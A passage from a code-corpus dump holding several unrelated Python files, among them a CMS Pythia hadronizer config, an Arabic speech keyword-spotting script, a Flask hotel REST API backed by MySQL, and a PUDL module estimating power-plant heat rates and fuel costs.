BIDS_EXAMPLES[variant][1]\n data_dir = _get_dataset_dir(variant, data_dir=data_dir, verbose=verbose)\n\n if _fetch_file(url, data_dir, filetype=None, resume=resume, verbose=verbose,\n md5sum=md5):\n return data_dir\n else:\n return None\n\n\ndef get_oasis_dkt31_mni152(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the Mindboggle DKT31 label\n atlas in MNI152NLin2009cAsym space\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('tpl-OASISTRT20', data_dir, url, resume, verbose)\n\n\ndef get_hcp32k_files(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files for conversion between fsaverage5/6\n and fs_LR(32k)\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('tpl-hcpLR32k', data_dir, url, resume, verbose)\n\n\ndef get_conte69_mesh(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load Conte69-atlas meshes in 32k resolution\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('tpl-conte69', data_dir, url, resume, verbose)\n","sub_path":"niworkflows/data/getters.py","file_name":"getters.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564405392","text":"import FWCore.ParameterSet.Config as cms\n\nfrom Configuration.Generator.PythiaUEZ2starSettings_cfi import *\nfrom GeneratorInterface.ExternalDecays.TauolaSettings_cff import *\n\ngenerator = cms.EDFilter(\"Pythia6HadronizerFilter\",\n pythiaHepMCVerbosity = cms.untracked.bool(True),\n maxEventsToPrint = cms.untracked.int32(0),\n pythiaPylistVerbosity = cms.untracked.int32(1),\n comEnergy = cms.double(8000.0),\n ExternalDecays = cms.PSet(\n Tauola = cms.untracked.PSet(\n TauolaPolar,\n TauolaDefaultInputCards\n ),\n parameterSets = cms.vstring('Tauola')\n ),\n UseExternalGenerators = cms.untracked.bool(True),\n PythiaParameters = cms.PSet(\n pythiaUESettingsBlock,\n processParameters = cms.vstring('MSEL=0 ! User defined processes', \n 'PMAS(5,1)=4.8 ! b quark mass',\n 'PMAS(6,1)=172.5 ! t quark mass',\n\t\t\t'MSTJ(1)=1 ! Fragmentation/hadronization on or off',\n\t\t\t'MSTP(61)=1 ! Parton showering on or off',\n 'MDME(174,1)=0 !Z decay into d dbar', \n 'MDME(175,1)=0 !Z decay into u ubar', \n 'MDME(176,1)=0 !Z decay into s sbar', \n 'MDME(177,1)=1 !Z decay into c cbar', \n 'MDME(178,1)=1 !Z decay into b bbar', \n 'MDME(179,1)=0 !Z decay into t tbar', \n 'MDME(182,1)=0 !Z decay into e- e+', \n 'MDME(183,1)=0 !Z decay into nu_e nu_ebar', \n 'MDME(184,1)=0 !Z decay into mu- mu+', \n 'MDME(185,1)=0 !Z decay into nu_mu nu_mubar', \n 'MDME(186,1)=0 !Z decay into tau- tau+', \n 'MDME(187,1)=0 !Z decay into nu_tau nu_taubar'), \n # This is a vector of ParameterSet names to be read, in this order\n parameterSets = cms.vstring('pythiaUESettings', \n 'processParameters')\n ),\n jetMatching = cms.untracked.PSet(\n scheme = cms.string(\"Madgraph\"),\n mode = cms.string(\"auto\"),\t# soup, or \"inclusive\" / \"exclusive\"\n MEMAIN_nqmatch = cms.int32(5),\n MEMAIN_etaclmax = cms.double(5),\n MEMAIN_qcut = cms.double(23.0),\n MEMAIN_minjets = cms.int32(0),\n MEMAIN_maxjets = cms.int32(2),\n MEMAIN_showerkt = cms.double(0), \n MEMAIN_excres = cms.string(\"\"),\n outTree_flag = cms.int32(0) \n ) \n)\n","sub_path":"genfragments/EightTeV/Hadronizer/Hadronizer_MgmMatchTuneZ2starEWKHiggsinoForceZccbb_8TeV_madgraph_tauola_cff.py","file_name":"Hadronizer_MgmMatchTuneZ2starEWKHiggsinoForceZccbb_8TeV_madgraph_tauola_cff.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"15468686","text":"for _ in range(int(input())):\n n = int(input())\n arr = [int(i) for i in input().split()]\n\n\n # def find_min(arr):\n # min_el = max(arr)\n # for i in range(len(arr)):\n # if arr[i] != -1 and arr[i] < min_el:\n # min_el = arr[i]\n # return min_el\n #\n #\n # def find_max(arr):\n # max_el = min(arr)\n # for i in range(len(arr)):\n # if arr[i] != -1 and arr[i] > max_el:\n # max_el = arr[i]\n # return max_el\n\n def max_m(arr):\n maximal_m = abs(arr[1] - arr[0])\n for i in range(len(arr) - 1):\n if abs(arr[i + 1] - arr[i]) > maximal_m:\n maximal_m = abs(arr[i + 1] - arr[i])\n return maximal_m\n\n\n arr_min_1 = []\n\n if arr[0] != -1 and arr[1] == -1:\n arr_min_1.append(arr[0])\n\n for i in range(1, len(arr) - 1):\n if arr[i] != -1 and (arr[i + 1] == -1 or arr[i - 1] == -1):\n arr_min_1.append(arr[i])\n\n if arr[-1] != -1 and arr[n - 1] == -1:\n arr_min_1.append(arr[-1])\n\n k = (max(arr_min_1) + min(arr_min_1)) / 2\n\n arr_new = []\n for i in range(len(arr)):\n if arr[i] == -1:\n arr_new.append(k)\n else:\n arr_new.append(arr[i])\n\n m = max_m(arr_new)\n\n print(int(m), int(k))\n","sub_path":"montaraka_birthday_2.py","file_name":"montaraka_birthday_2.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521149623","text":"\nfrom pydub import AudioSegment\nfrom pydub import AudioSegment\nimport os\n\nimport librosa\nfrom scipy.io import wavfile\nimport scipy.signal as sps\nimport librosa\nimport tensorflow as tf\nimport numpy as np\nfrom pydub import AudioSegment, effects \n\nSAVED_MODEL_PATH = \"model01.h5\"\n\nSAMPLES_TO_CONSIDER = 22050\n\nclass _Keyword_Spotting_Service:\n\n\n model = None\n _mapping = [\n \"\\u0631\",\n \"\\u0628\",\n \"\\u0643\",\n \"\\u0645\",\n \"\\u0639\",\n \"\\u0634\",\n \"\\u0623\",\n \"\\u0632\",\n \"\\u0647\",\n \"\\u0646\",\n \"\\u0636\",\n \"\\u0635\",\n \"\\u062a\",\n \"\\u0648\",\n \"\\u062f\",\n \"\\u062d\",\n \"\\u064a\",\n \"\\u0638\",\n \"\\u0642\",\n \"\\u063a\",\n \"\\u062b\",\n \"\\u0633\",\n \"\\u0630\",\n \"\\u062c\",\n \"\\u0641\",\n \"\\u0644\",\n \"\\u0637\",\n \"\\u062e\"\n ]\n \n\n _instance = None\n\n\n def predict(self, file_path):\n\n\n # extract MFCC\n MFCCs = self.preprocess(file_path)\n\n MFCCs = MFCCs[np.newaxis, ..., np.newaxis]\n # print(MFCCs.shape)\n\n predictions = self.model.predict(MFCCs)\n predicted_index = np.argmax(predictions)\n predicted_keyword = self._mapping[predicted_index]\n return predicted_keyword\n\n\n def preprocess(self, file_path, num_mfcc=13, n_fft=2048, hop_length=512):\n\n\n # load audio file\n\n signal, sample_rate = librosa.load(file_path)\n\n if len(signal) >= SAMPLES_TO_CONSIDER:\n signal = signal[:SAMPLES_TO_CONSIDER]\n\n # extract MFCCs\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc=num_mfcc, n_fft=n_fft,\n hop_length=hop_length)\n # MFCCs = librosa.feature.melspectrogram(y=signal, sr=sample_rate, n_fft=2048, hop_length=1024)\n # MFCCs = librosa.power_to_db(MFCCs, ref=np.max)\n \n # print(MFCCs.shape)\n nx, ny= MFCCs.shape\n # print(nx,ny)\n # MFCCs= np.reshape(MFCCs, ((-1, 22, 128)))\n\n\n return MFCCs.T\n\n\ndef Keyword_Spotting_Service():\n\n\n if _Keyword_Spotting_Service._instance is None:\n _Keyword_Spotting_Service._instance = _Keyword_Spotting_Service()\n _Keyword_Spotting_Service.model = tf.keras.models.load_model(SAVED_MODEL_PATH)\n return _Keyword_Spotting_Service._instance\n\n\n\n\nif __name__ == \"__main__\":\n file=(\"/test/أ11 .wav\")\n\n # sound = AudioSegment.from_file(file)\n # print(\"----------Before Conversion--------\")\n # print(\"Frame Rate\", sound.frame_rate)\n # print(\"Channel\", sound.channels)\n # print(\"Sample Width\",sound.sample_width)\n\n # # Change Frame Rate\n \n # sound = sound.set_frame_rate(22000)\n # sound = effects.normalize(sound) \n\n # # Change Channel\n # sound = sound.set_channels(1)\n # # Change Sample Width\n # sound = sound.set_sample_width(2)\n \n # sound.export(file, format =\"wav\")\n \n kss = Keyword_Spotting_Service()\n kss1 = Keyword_Spotting_Service()\n\n assert kss is kss1\n\n # make a prediction\n keyword = kss.predict(file)\n print(keyword)\n","sub_path":"Recognition system/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"236232544","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nimport os\n\ndata_path = \"data/Real estate.csv\"\n\ndf = pd.read_csv(data_path, delimiter=\",\")\n\n# NH format\nmyScaler = MinMaxScaler()\nfeatures = df.iloc[:, 1:-1].to_numpy(copy=True, dtype=\"float64\")\n\nfeatures = myScaler.fit_transform(features)\n\nlabel = df.iloc[:, -1].to_numpy(copy=True, dtype=\"float64\").reshape([-1,1])\nlabel = myScaler.fit_transform(label)\n\nshuffle_idx = np.random.permutation(range(features.shape[0]))\n\nfeatures = features[shuffle_idx, :]\nlabel = label[shuffle_idx]\n\nfeature_file = open(\"data/features_realEstate.txt\", \"w\")\nfor row in features:\n np.savetxt(feature_file, row, fmt=\"%f\")\n\nfeature_file.close()\n\nlabel_file = open(\"data/label_realEstate.txt\", \"w\")\nfor row in label:\n np.savetxt(label_file, row, fmt=\"%f\")\n\nlabel_file.close()\n\nnp.save(\"data/features_admission.npy\", features)\nnp.save(\"data/label_admission.npy\", label)\n\n\n","sub_path":"dataset_utils/dataset_realEstate.py","file_name":"dataset_realEstate.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362355147","text":"from flask_restful import Resource, reqparse\nfrom flask_jwt_extended import jwt_required\nfrom models.hotel import HotelModel\nfrom models.site import SiteModel\nfrom resources.filtros import *\nimport mysql.connector\nfrom env import MYSQL_USER, MYSQL_PASS, MYSQL_HOST, MYSQL_DB\n\npath_params = reqparse.RequestParser()\npath_params.add_argument('cidade', type=str)\npath_params.add_argument('estrelas_min', type=float)\npath_params.add_argument('estrelas_max', type=float)\npath_params.add_argument('diaria_min', type=float)\npath_params.add_argument('diaria_max', type=float)\npath_params.add_argument('limit', type=int)\npath_params.add_argument('offset', type=int)\n\nclass Hoteis(Resource):\n def get(self):\n connection = mysql.connector.connect(user=MYSQL_USER, password=MYSQL_PASS, host=MYSQL_HOST, database=MYSQL_DB)\n cursor = connection.cursor()\n\n dados = path_params.parse_args()\n dados_validos = {chave:dados[chave] for chave in dados if dados[chave] is not None}\n parametros = normalize_path_params(**dados_validos)\n\n if not parametros.get('cidade'):\n consulta = consulta_sem_cidade\n else:\n consulta = consulta_com_cidade\n tupla = tuple([parametros[chave] for chave in parametros])\n cursor.execute(consulta, tupla)\n resultado = cursor.fetchall()\n hoteis = []\n if resultado:\n for linha in resultado:\n hoteis.append({\n 'id': linha[0],\n 'nome': linha[1],\n 'estrelas': linha[2],\n 'diaria': linha[3],\n 'cidade': linha[4],\n 'site_id': linha[5]\n })\n return {'hoteis': hoteis}\n\nclass Hotel(Resource):\n argumentos = reqparse.RequestParser()\n argumentos.add_argument('nome', type=str, required=True, help=\"The field 'nome' cannot be left blank\")\n argumentos.add_argument('estrelas', type=float, required=True, help=\"The field 'estrelas' cannot be left blank\")\n argumentos.add_argument('diaria')\n argumentos.add_argument('cidade')\n argumentos.add_argument('site_id', type=int, required=True, help=\"Every hotel needs to be linked with a site\")\n\n def get(self, hotel_id):\n hotel = HotelModel.find(hotel_id)\n if hotel:\n return hotel.json()\n return {'message': 'Hotel not found.'}, 404\n\n @jwt_required\n def post(self, hotel_id):\n if HotelModel.find(hotel_id):\n return {\"message\":\"Id '{}' already exists.\".format(hotel_id)}, 400\n dados = Hotel.argumentos.parse_args()\n hotel = HotelModel(hotel_id, **dados)\n if not SiteModel.find_id(dados.get('site_id')):\n return {'message': 'The hotel must to be associated to a valid site id.'}, 400\n try:\n hotel.save()\n except:\n return {'message':'An internal error occurred trying to save hotel.'}, 500\n return hotel.json(), 200\n\n @jwt_required\n def put(self, hotel_id):\n dados = Hotel.argumentos.parse_args()\n hotel_encontrado = HotelModel.find(hotel_id)\n if hotel_encontrado:\n hotel_encontrado.update(**dados)\n hotel_encontrado.save()\n return hotel_encontrado.json(), 200\n hotel = HotelModel(hotel_id, **dados)\n try:\n hotel.save()\n except:\n return {'message':'An internal error occurred trying to save hotel.'}, 500\n return hotel.json(), 201\n\n @jwt_required\n def delete(self, hotel_id):\n hotel = HotelModel.find(hotel_id)\n if hotel:\n try:\n hotel.delete()\n except:\n return {'message':'An internal error occurred trying to delete hotel.'}, 500\n return {'message': 'Hotel deleted.'}, 200\n return {'message': 'Hotel not found.'}, 404\n","sub_path":"resources/hotel.py","file_name":"hotel.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"194717064","text":"\"\"\"A module with functions to aid generating MCOE.\"\"\"\n\nfrom pudl import analysis, clean_pudl, outputs, pudl\nfrom pudl import constants as pc\nimport numpy as np\nimport pandas as pd\n\n\ndef gens_with_bga(bga_eia860, gen_eia923):\n \"\"\"\n Label EIA generators based on which type of associations they have.\n\n Given the boiler generator associations, and the generation records,\n label each generator according to which kinds of associations it has\n had. Three boolean values are set for each generator, for each time\n period:\n - boiler_generator_assn: True if the generator has any boilers\n associated with it, False otherwise.\n - plant_assn: True if all the generators associated with a given\n plant_id have a boiler associated with them, False otherwise.\n - complete_assn: True if the generator has *ever* been part of a\n plant in which all generators had a boiler associated with them,\n False if otherwise.\n\n Returns:\n A dataframe containing plant_id_eia, generator_id, boiler_id, and\n the three boolean columns mentioned above.\n \"\"\"\n # All generators from the Boiler Generator Association table (860)\n bga8 = bga_eia860[['report_date', 'plant_id_eia',\n 'generator_id', 'boiler_id']]\n\n # All generators from the generation_eia923 table, by year.\n gens9 = gen_eia923[['report_date', 'plant_id_eia',\n 'generator_id']].drop_duplicates()\n\n # Merge in the boiler associations across all the different years of\n # generator - plant associations.\n gens = analysis.merge_on_date_year(gens9, bga8, how='left',\n on=['plant_id_eia', 'generator_id'])\n # Set a boolean flag on each record indicating whether the plant-generator\n # pairing has a boiler associated with it.\n gens['boiler_generator_assn'] = \\\n np.where(gens.boiler_id.isnull(), False, True)\n\n # Find all the generator records that were ever missing a boiler:\n unassociated_generators = gens[~gens['boiler_generator_assn']]\n # Create a list of plants with unassociated generators, by year.\n unassociated_plants = unassociated_generators.\\\n drop_duplicates(subset=['plant_id_eia', 'report_date']).\\\n drop(['generator_id', 'boiler_id', 'boiler_generator_assn'], axis=1)\n # Tag those plant-years as being unassociated\n unassociated_plants['plant_assn'] = False\n\n # Merge the plant association flag back in to the generators\n gens = pd.merge(gens, unassociated_plants, how='left',\n on=['plant_id_eia', 'report_date'])\n # Tag the rest of the generators as being part of a plant association...\n # This may or may not be true. Need to filter out partially associated\n # plants in the next step.\n gens['plant_assn'] = gens.plant_assn.fillna(value=True)\n\n # Using the associtated plants, extract the generator/boiler combos\n # that represent complete plants at any time to preserve\n # associations (i.e. if a coal plant had its boilers and generators\n # fully associated in the bga table in 2011 and then adds a\n # combined cycle plant the coal boiler/gen combo will be saved).\n\n # Remove the report_date:\n gens_complete = gens.drop('report_date', axis=1)\n # Select only those generators tagged as being part of a complete plant:\n gens_complete = gens_complete[gens_complete['plant_assn']]\n\n gens_complete = gens_complete.drop_duplicates(subset=['plant_id_eia',\n 'generator_id',\n 'boiler_id'])\n gens_complete['complete_assn'] = True\n\n gens = gens.merge(gens_complete[['plant_id_eia', 'generator_id',\n 'boiler_id', 'complete_assn']],\n how='left',\n on=['plant_id_eia', 'generator_id', 'boiler_id'])\n gens['complete_assn'] = gens.complete_assn.fillna(value=False)\n\n return(gens)\n\n\ndef boiler_generator_association(bga_eia860, gens_eia860,\n gen_eia923, bf_eia923,\n start_date=None, end_date=None,\n testing=False):\n \"\"\"\n Temporary function to create more complete boiler generator associations.\n\n This is a temporary function until it can be pulled into a datatable. This\n function pulls in all of the generators and all of the boilers, uses them\n to create a relatively complete association list. First, the original bga\n table is used, then the remaining unmatched generators are matched to the\n boilers with the same string (in the same plant and year), then the unit\n codes are used to connect all generators and boilers within each given\n unit. Each of the incomplete or inaccurate records are tagged in columns.\n\n Notes:\n - unit_code is coming out as a mix of None and NaN values. Should pick\n a single type for the column and stick to it (or enforce on output).\n \"\"\"\n pudl_engine = pudl.db_connect_pudl(testing=testing)\n # compile and scrub all the parts\n bga_eia860.drop_duplicates(['plant_id_eia', 'boiler_id',\n 'generator_id', 'report_date'], inplace=True)\n bga_eia860.drop(['id', 'operator_id'], axis=1, inplace=True)\n\n gen_eia923 = gen_eia923.set_index(pd.DatetimeIndex(gen_eia923.report_date))\n gen_eia923_gb = gen_eia923.groupby(\n [pd.Grouper(freq='AS'), 'plant_id_eia', 'generator_id'])\n gen_eia923 = gen_eia923_gb['net_generation_mwh'].sum().reset_index()\n gen_eia923['missing_from_923'] = False\n\n # The generator records that are missing from 860 but appear in 923\n # I created issue no. 128 to deal with this at a later date\n merged = pd.merge(gens_eia860, gen_eia923,\n on=['plant_id_eia', 'report_date', 'generator_id'],\n indicator=True, how='outer')\n missing = merged[merged['_merge'] == 'right_only']\n\n # compile all of the generators\n gens = pd.merge(gen_eia923, gens_eia860,\n on=['plant_id_eia', 'report_date', 'generator_id'],\n how='outer')\n\n gens = gens[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'unit_code',\n 'net_generation_mwh',\n 'missing_from_923']].drop_duplicates()\n\n # create the beginning of a bga compilation w/ the generators as the\n # background\n bga_compiled_1 = pd.merge(gens, bga_eia860,\n on=['plant_id_eia', 'generator_id',\n 'report_date'],\n how='outer')\n\n # Side note: there are only 6 generators that appear in bga8 that don't\n # apear in gens9 or gens8 (must uncomment-out the og_tag creation above)\n # bga_compiled_1[bga_compiled_1['og_tag'].isnull()]\n\n bf_eia923 = bf_eia923.set_index(pd.DatetimeIndex(bf_eia923.report_date))\n bf_eia923_gb = bf_eia923.groupby(\n [pd.Grouper(freq='AS'), 'plant_id_eia', 'boiler_id'])\n bf_eia923 = bf_eia923_gb['total_heat_content_mmbtu'].sum().reset_index()\n\n bf_eia923.drop_duplicates(\n subset=['plant_id_eia', 'report_date', 'boiler_id'], inplace=True)\n\n # Create a set of bga's that are linked, directly from bga8\n bga_assn = bga_compiled_1[bga_compiled_1['boiler_id'].notnull()].copy()\n bga_assn['bga_source'] = 'eia860_org'\n\n # Create a set of bga's that were not linked directly through bga8\n bga_unassn = bga_compiled_1[bga_compiled_1['boiler_id'].isnull()].copy()\n bga_unassn = bga_unassn.drop(['boiler_id'], axis=1)\n\n # Create a list of boilers that were not in bga8\n bf9_bga = bf_eia923.merge(bga_compiled_1,\n on=['plant_id_eia', 'boiler_id', 'report_date'],\n how='outer',\n indicator=True)\n bf9_not_in_bga = bf9_bga[bf9_bga['_merge'] == 'left_only']\n bf9_not_in_bga = bf9_not_in_bga.drop(['_merge'], axis=1)\n\n # Match the unassociated generators with unassociated boilers\n # This method is assuming that some the strings of the generators and the\n # boilers are the same\n bga_unassn = bga_unassn.merge(bf9_not_in_bga[['plant_id_eia',\n 'boiler_id',\n 'report_date']],\n how='left',\n left_on=['report_date',\n 'plant_id_eia',\n 'generator_id'],\n right_on=['report_date',\n 'plant_id_eia',\n 'boiler_id'])\n bga_unassn.sort_values(['report_date', 'plant_id_eia'], inplace=True)\n bga_unassn['bga_source'] = None\n bga_unassn.loc[bga_unassn.boiler_id.notnull(),\n 'bga_source'] = 'string_assn'\n\n bga_compiled_2 = bga_assn.append(bga_unassn)\n bga_compiled_2.sort_values(['plant_id_eia', 'report_date'], inplace=True)\n bga_compiled_2['missing_from_923'].fillna(value=True, inplace=True)\n\n # Connect the gens and boilers in units\n bga_compiled_units = bga_compiled_2.loc[\n bga_compiled_2['unit_code'].notnull()]\n bga_gen_units = bga_compiled_units.drop(['boiler_id'], axis=1)\n bga_boil_units = bga_compiled_units[['plant_id_eia',\n 'report_date',\n 'boiler_id',\n 'unit_code']].copy()\n bga_boil_units.dropna(subset=['boiler_id'], inplace=True)\n\n # merge the units with the boilers\n bga_unit_compilation = bga_gen_units.merge(bga_boil_units,\n how='outer',\n on=['plant_id_eia',\n 'report_date',\n 'unit_code'],\n indicator=True)\n # label the bga_source\n bga_unit_compilation. \\\n loc[bga_unit_compilation['bga_source'].isnull(),\n 'bga_source'] = 'unit_connection'\n bga_unit_compilation.drop(['_merge'], axis=1, inplace=True)\n bga_non_units = bga_compiled_2[bga_compiled_2['unit_code'].isnull()]\n\n # combine the unit compilation and the non units\n bga_compiled_3 = bga_non_units.append(bga_unit_compilation)\n\n # resort the records and the columns\n bga_compiled_3.sort_values(['plant_id_eia', 'report_date'], inplace=True)\n bga_compiled_3 = bga_compiled_3[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'boiler_id',\n 'unit_code',\n 'bga_source',\n 'net_generation_mwh',\n 'missing_from_923']]\n\n # label plants that have 'bad' generator records (generators that have MWhs\n # in gens9 but don't have connected boilers) create a df with just the bad\n # plants by searching for the 'bad' generators\n bad_plants = bga_compiled_3[(bga_compiled_3['boiler_id'].isnull()) &\n (bga_compiled_3['net_generation_mwh'] > 0)].\\\n drop_duplicates(subset=['plant_id_eia', 'report_date'])\n bad_plants = bad_plants[['plant_id_eia', 'report_date']]\n\n # merge the 'bad' plants back into the larger frame\n bga_compiled_3 = bga_compiled_3.merge(bad_plants,\n how='outer',\n on=['plant_id_eia', 'report_date'],\n indicator=True)\n\n # use the indicator to create labels\n bga_compiled_3['plant_w_bad_generator'] = \\\n np.where(bga_compiled_3._merge == 'both', True, False)\n # Note: At least one gen has reported MWh in 923, but could not be\n # programmatically mapped to a boiler\n\n # we don't need this one anymore\n bga_compiled_3 = bga_compiled_3.drop(['_merge'], axis=1)\n\n # create a label for generators that are unmapped but in 923\n bga_compiled_3['unmapped_but_in_923'] = \\\n np.where((bga_compiled_3.boiler_id.isnull()) &\n ~bga_compiled_3.missing_from_923 &\n (bga_compiled_3.net_generation_mwh == 0),\n True,\n False)\n\n # create a label for generators that are unmapped\n bga_compiled_3['unmapped'] = np.where(bga_compiled_3.boiler_id.isnull(),\n True,\n False)\n bga_compiled_3 = bga_compiled_3.drop('net_generation_mwh', axis=1)\n bga_compiled_3.loc[bga_compiled_3.unit_code.isnull(), 'unit_code'] = None\n return(bga_compiled_3)\n\n\ndef heat_rate(bga, gen_eia923, bf_eia923, gens_eia860, min_heat_rate=5.5):\n \"\"\"Calculate heat rates (mmBTU/MWh) within separable generation units.\"\"\"\n generation_w_boilers = \\\n analysis.merge_on_date_year(gen_eia923, bga, how='left',\n on=['plant_id_eia', 'generator_id'])\n\n # Calculate net generation from all generators associated with each boiler\n gb1 = generation_w_boilers.groupby(\n by=['plant_id_eia', 'report_date', 'boiler_id'])\n gen_by_boiler = gb1.net_generation_mwh.sum().to_frame().reset_index()\n gen_by_boiler.rename(\n columns={'net_generation_mwh': 'net_generation_mwh_boiler'},\n inplace=True)\n\n # Calculate net generation per unique boiler generator combo\n gb2 = generation_w_boilers.groupby(\n by=['plant_id_eia', 'report_date', 'boiler_id', 'generator_id'])\n gen_by_bg = gb2.net_generation_mwh.sum().to_frame().reset_index()\n gen_by_bg.rename(\n columns={'net_generation_mwh': 'net_generation_mwh_boiler_gen'},\n inplace=True)\n\n # squish them together\n gen_by_bg_and_boiler = \\\n pd.merge(gen_by_boiler, gen_by_bg,\n on=['plant_id_eia', 'report_date', 'boiler_id'], how='left')\n\n # Bring in boiler fuel consumption and boiler generator associations\n bg = analysis.merge_on_date_year(bf_eia923, bga, how='left',\n on=['plant_id_eia', 'boiler_id'])\n # Merge boiler fuel consumption in with our per-boiler and boiler\n # generator combo net generation calculations\n bg = pd.merge(bg, gen_by_bg_and_boiler, how='left',\n on=['plant_id_eia', 'report_date',\n 'boiler_id', 'generator_id'])\n\n # Use the proportion of the generation of each generator to allot mmBTU\n bg['proportion_of_gen_by_boil_gen'] = \\\n bg['net_generation_mwh_boiler_gen'] / bg['net_generation_mwh_boiler']\n bg['fuel_consumed_mmbtu_generator'] = \\\n bg['proportion_of_gen_by_boil_gen'] * bg['total_heat_content_mmbtu']\n\n # Generators with no generation and no associated fuel consumption result\n # in some 0/0 = NaN values, which propagate when summed. For our purposes\n # they should be set to zero, since those generators are contributing\n # nothing to either the fuel consumed or the proportion of net generation.\n bg['proportion_of_gen_by_boil_gen'] = \\\n bg.proportion_of_gen_by_boil_gen.fillna(0)\n bg['fuel_consumed_mmbtu_generator'] = \\\n bg.fuel_consumed_mmbtu_generator.fillna(0)\n\n # Get total heat consumed per time period by each generator.\n # Before this, the bg dataframe has mulitple records for each generator\n # when there are multiple boiler associated with each generators. This step\n # squishes the boiler level data into generators to be compared to the\n # generator level net generation.\n bg_gb = bg.groupby(by=['plant_id_eia', 'report_date', 'generator_id'])\n bg = bg_gb.fuel_consumed_mmbtu_generator.sum().to_frame().reset_index()\n # Now that we have the fuel consumed per generator, bring the net\n # generation per generator back in:\n hr = pd.merge(bg, gen_eia923, how='left',\n on=['plant_id_eia', 'report_date', 'generator_id'])\n # Finally, calculate heat rate\n hr['heat_rate_mmbtu_mwh'] = \\\n hr['fuel_consumed_mmbtu_generator'] / \\\n hr['net_generation_mwh']\n\n # Importing the plant association tag to filter out the\n # generators that are a part of plants that aren't in the bga table\n gens = gens_with_bga(bga, gen_eia923)\n # This is a per-generator table now -- so we don't want the boiler_id\n # And we only want the ones with complete associations.\n gens_assn = gens[gens['complete_assn']].drop('boiler_id', axis=1)\n gens_assn = gens_assn.drop_duplicates(subset=['plant_id_eia',\n 'generator_id',\n 'report_date'])\n hr = pd.merge(hr, gens_assn,\n on=['plant_id_eia', 'report_date', 'generator_id'])\n\n # Only keep the generators with reasonable heat rates\n hr = hr[hr.heat_rate_mmbtu_mwh >= min_heat_rate]\n\n hr = analysis.merge_on_date_year(\n hr,\n gens_eia860[['report_date', 'plant_id_eia', 'generator_id',\n 'fuel_type_pudl', 'fuel_type_count']],\n how='inner', on=['plant_id_eia', 'generator_id'])\n\n # Sort it a bit and clean up some types\n first_cols = [\n 'report_date',\n 'operator_id',\n 'operator_name',\n 'plant_id_eia',\n 'plant_name',\n 'generator_id'\n ]\n hr = outputs.organize_cols(hr, first_cols)\n hr['util_id_pudl'] = hr.util_id_pudl.astype(int)\n hr['operator_id'] = hr.operator_id.astype(int)\n hr = hr.sort_values(by=['operator_id', 'plant_id_eia',\n 'generator_id', 'report_date'])\n return(hr)\n\n\ndef fuel_cost(hr, frc_eia923, gen_eia923):\n \"\"\"\n Calculate fuel costs per MWh on a per generator basis for MCOE.\n\n Fuel costs are reported on a per-plant basis, but we want to estimate them\n at the generator level. This is complicated by the fact that some plants\n have several different types of generators, using different fuels. We have\n fuel costs broken out by type of fuel (coal, oil, gas), and we know which\n generators use which fuel based on their energy_source code and reported\n prime_mover. Coal plants use a little bit of natural gas or diesel to get\n started, but based on our analysis of the \"pure\" coal plants, this amounts\n to only a fraction of a percent of their overal fuel consumption on a\n heat content basis, so we're ignoring it for now.\n\n For plants whose generators all rely on the same fuel source, we simply\n attribute the fuel costs proportional to the fuel heat content consumption\n associated with each generator.\n\n For plants with more than one type of generator energy source, we need to\n split out the fuel costs according to fuel type -- so the gas fuel costs\n are associated with generators that have energy_source gas, and the coal\n fuel costs are associated with the generators that have energy_source coal.\n \"\"\"\n # Split up the plants on the basis of how many different primary energy\n # sources the component generators have:\n gen_w_ft = pd.merge(gen_eia923,\n hr[['plant_id_eia', 'report_date', 'generator_id',\n 'fuel_type_pudl', 'fuel_type_count',\n 'heat_rate_mmbtu_mwh']],\n how='inner',\n on=['plant_id_eia', 'report_date', 'generator_id'])\n\n one_fuel = gen_w_ft[gen_w_ft.fuel_type_count == 1]\n multi_fuel = gen_w_ft[gen_w_ft.fuel_type_count > 1]\n\n # Bring the single fuel cost & generation information together for just\n # the one fuel plants:\n one_fuel = pd.merge(one_fuel, frc_eia923[['plant_id_eia', 'report_date',\n 'fuel_cost_per_mmbtu',\n 'fuel_type_pudl',\n 'total_fuel_cost',\n 'total_heat_content_mmbtu']],\n how='left', on=['plant_id_eia', 'report_date'])\n # We need to retain the different energy_source information from the\n # generators (primary for the generator) and the fuel receipts (which is\n # per-delivery), and in the one_fuel case, there will only be a single\n # generator getting all of the fuels:\n one_fuel.rename(columns={'fuel_type_pudl_x': 'ftp_gen',\n 'fuel_type_pudl_y': 'ftp_frc'},\n inplace=True)\n\n # Do the same thing for the multi fuel plants, but also merge based on\n # the different fuel types within the plant, so that we keep that info\n # as separate records:\n multi_fuel = pd.merge(multi_fuel,\n frc_eia923[['plant_id_eia', 'report_date',\n 'fuel_cost_per_mmbtu',\n 'fuel_type_pudl']],\n how='left', on=['plant_id_eia', 'report_date',\n 'fuel_type_pudl'])\n\n # At this point, within each plant, we should have one record per\n # combination of generator & fuel type, which includes the heat rate of\n # each generator, as well as *plant* 